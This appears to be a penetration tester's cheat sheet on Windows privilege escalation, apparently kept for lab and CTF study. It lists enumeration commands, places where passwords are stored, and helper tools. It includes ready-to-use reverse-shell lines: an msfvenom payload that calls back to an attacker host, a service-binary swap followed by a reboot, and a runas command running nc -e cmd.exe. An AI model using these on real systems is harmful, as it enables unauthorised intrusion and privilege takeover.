Privilege Escalation on Windows

Privilege Escalation Paths – look for:

  • Misconfigured services
  • File permissions on binaries or services
  • OS/Kernel vulnerabilities
  • Vulnerable software running with high privileges
  • Sensitive information stored in local files – like hard coded credentials
  • Registry settings that always elevate privileges before executing a binary
  • Other, be creative… 😉

Old Windows version, check HackTheBox – Servmon (for winPEAS, to validate)

Service

Kernel

Search for exploits? List applied KB:

OS Version

Seems more reliable than systeminfo and winPEAS output…

REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ReleaseId
powershell
Get-WmiObject -query 'select * from win32_quickfixengineering'

Password Mining

Password Mining
    Registry
        HKCU\Software\SimonTacham\PuTTY\Sessions
        AutoLogin
        VNC
    Logs
    .rdp Files
    Memory
        Mimikatz
        Process Dump (minidump)
    Configuration Files
        unattend xml
        SiteList.xmlm
        web.config
        vnc.ini
    Cached SAM

Registry

  • Autorun
  • AlwaysInstallElevated

Scheduled Tasks

  • Binary Overwrite
  • Missing Binary

Hot Potato

To complete…

Startup Applications

To complete….

User Enumeration

See also Users & Groups & Active Directory (AD).

whoami
net user
net user <username>

Groups for current user

whoami /groups

Privileges for current user

The Disabled state only indicates if the current process enabled this privilege, but the user still has the privilege.

whoami /priv

Host

Hostname

Hostname can give indication of the server’s purpose and OS. Host naming convention could be used to discover more targets.

hostname

OS / Architecture

Use this instead!! Double-check…

REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ReleaseId

English OS

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

French OS

systeminfo | findstr /B /C:"Nom du syst" /C:"Version du syst" /C:"Type du syst"

Processes & Services

Look for processes running with high privileged accounts, and with insecure permissions or vulnerabilities.

Tasklist Official Documentation. Output is limited when not an admin.

Vulnerabilities

See Windows Unquoted Service Path.

Processes mapped to specific Windows services

tasklist /SVC
powershell
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

List services & drivers

Obtains and displays information about the specified service, driver, type of service, or type of driver.

sc query
sc query <service name>
sc query type=service
sc qc <service name>

NOT TESTED

sc config <service name> binPath=c:\...\rev.exe

Check file permissions for all running processes

powershell
$list=Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

foreach ($item in $list) {
    if($item.PathName) {
        if($item.PathName -match '"') {
            icacls $item.PathName.split('"')[1]
        }else {
            icacls $item.PathName.split(' ')[0]
        }
    }
}

Check permissions on a specific file

If interesting (custom) services, check if we can overwrite the executable. See Official Documentation for icacls.

  • F – Full access
  • M- Modify access
  • RX – Read and execute access
  • R – Read-only access
  • W – Write-only access
icacls "C:\Program Files\<some file>.exe"
Installed applications / Software
msfvenom -p windows/shell_reverse_tcp LHOST=$KALI_IP LPORT=443 -f exe > myprecious.exe
sudo nc -nlvp 443

# Transfer file to Windows

cd "C:\Program Files"
cd <software folder>
move "Software.exe" "Software_bak.exe"
move myprecious.exe Software.exe
shutdown /r /t 5

Network

Can be used to pivot 😉

ipconfig /all

Route Official Documentation

route print

Listening ports and established sessions

netstat -ano

List shares

net share

Firewall

See netsh official documentation, and documentation on netsh firewall.

netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
netsh advfirewall firewall show rule status=enabled name=all
netsh advfirewall firewall show rule dir=out status=enabled name=all | findstr /i LocalPort | sort /unique
netsh advfirewall firewall show rule name=all dir=in type=dynamic

Open ports

netsh firewall show state

Scheduled Jobs

Look for scripts in scheduled jobs that can be modified and run as high privileged users.

See schtasks official documentation.

schtasks /query /fo LIST
schtasks /query /fo LIST /v

Display only task names

schtasks /query /fo LIST | findstr /B /C:"TaskName"

Task To Run

Can this be used for Windows Unquoted Service Path? TO VALIDATE 😉

schtasks /query /fo LIST /v | findstr /C:"Task To Run"

Software Versions

See Windows Management Instrumentation (WMI). Only for programs installed using Windows Installer.

wmic product get name, version, vendor
wmic qfe get Caption, Description, HotFixID, InstalledOn

Permissions on files

Use AccessChk from SysInternals.

accesschk.exe -uws "Everyone" "C:\Program Files" -accepteula
accesschk.exe -uws "Everyone" "C:\Program Files"
powershell
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

Unmounted Disks

See mountvol.

mountvol

Device Drivers & Kernel Modules

Loaded drivers

powershell
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path

Drivers & versions

powershell
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | sort-
object -Property DeviceName -Unique

Binaries That AutoElevate

Check the status of the AlwaysInstallElevated registry. Value of 1 allows any user to run Windows Installer packages with elevated privileges. If enabled, craft an MSI file and run it to elevate privileges.

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

Automation

Use winPEAS and PowerUp.

WinPEAS

WinPeas is the best option.

git clone https://github.com/carlospolop/PEASS-ng.git
cp ~/PEASS-ng/winPEAS/winPEASbat/winPEAS.bat ~/impacket-share

Upload the file on the victim host. See File Transfer. Execute winPEAS on the victim:

winPEAS.bat

When commands like systeminfo and tasklist give Access denied errors:

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/ab1b188fb3e88f5071f9faa98e432921f033d357/winPEAS/winPEASexe/winPEAS/bin/Release/Dotfuscated/winPEAS.exe

Jaws

wget https://raw.githubusercontent.com/411Hall/JAWS/master/jaws-enum.ps1
.\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt

windows-privesc-check

See windows-privesc-check on GitHub.

Help

windows-privesc-check2.exe -h

List groups – Dump info to analyze manually

windows-privesc-check2.exe --dump -G

List drives – Dump info to analyze manually

windows-privesc-check2.exe --dump -D

List shares – Dump info to analyze manually

windows-privesc-check2.exe --dump -H

Identify and report security weaknesses

windows-privesc-check2.exe --audit -S -o C:\Users\<username>\Desktop\audit-services
windows-privesc-check2.exe --audit --allfiles -o report-allfiles.txt
examine opts:
    At least one of these to indicate what to examine (*=not implemented)

    -a, --all           All Simple Checks (non-slow)
    -A, --allfiles      All Files and Directories (slow)
    -D, --drives        Drives
    -e, --reg_keys      Misc security-related reg keys
    -E, --eventlogs     Event Log*
    -f INTERESTING_FILE_LIST, --interestingfiledir=INTERESTING_FILE_LIST
                        Changes -A behaviour.  Look here INSTEAD
    -F INTERESTING_FILE_FILE, --interestingfilefile=INTERESTING_FILE_FILE
                        Changes -A behaviour.  Look here INSTEAD.  On dir per
                        line
    -G, --groups        Groups
    -H, --shares        Shares
    -I, --installed_software
                        Installed Software
    -j, --tasks         Scheduled Tasks
    -k, --drivers       Kernel Drivers
    -L, --loggedin      Logged In
    -O, --ntobjects     NT Objects
    -n, --nointerestingfiles
                        Changes -A/-f/-F behaviour.  Don't report interesting
                        files
    -N, --nounreadableif
                        Changes -A/-f/-F behaviour.  Report only interesting
                        files readable by untrsuted users (see -x, -X, -b, -B)
    -P, --progfiles     Program Files Directory Tree
    -r, --registry      Registry Settings + Permissions
    -R, --processes     Processes
    -S, --services      Windows Services
    -t, --paths         PATH
    -T PATCHFILE, --patches=PATCHFILE
                        Patches.  Arg is filename of xlsx patch info.
                        Download from
                        http://go.microsoft.com/fwlink/?LinkID=245778 or pass
                        'auto' to fetch automatically
    -U, --users         Users
    -v, --verbose       More verbose output on console
    -W, --errors        Die on errors instead of continuing (for debugging)
    -z, --noappendices  No report appendices in --audit mode

adPEAS

Check https://github.com/61106960/adPEAS

Privilege Escalation Techniques

Stored Credentials

If cmdkey /list returns entries, it means that you may able to runas certain user who stored his credentials in windows.

runas /savecred /user:ACCESS\Administrator "c:\windows\system32\cmd.exe /c \IP\share\nc.exe -nv KALI_IP 80 -e cmd.exe"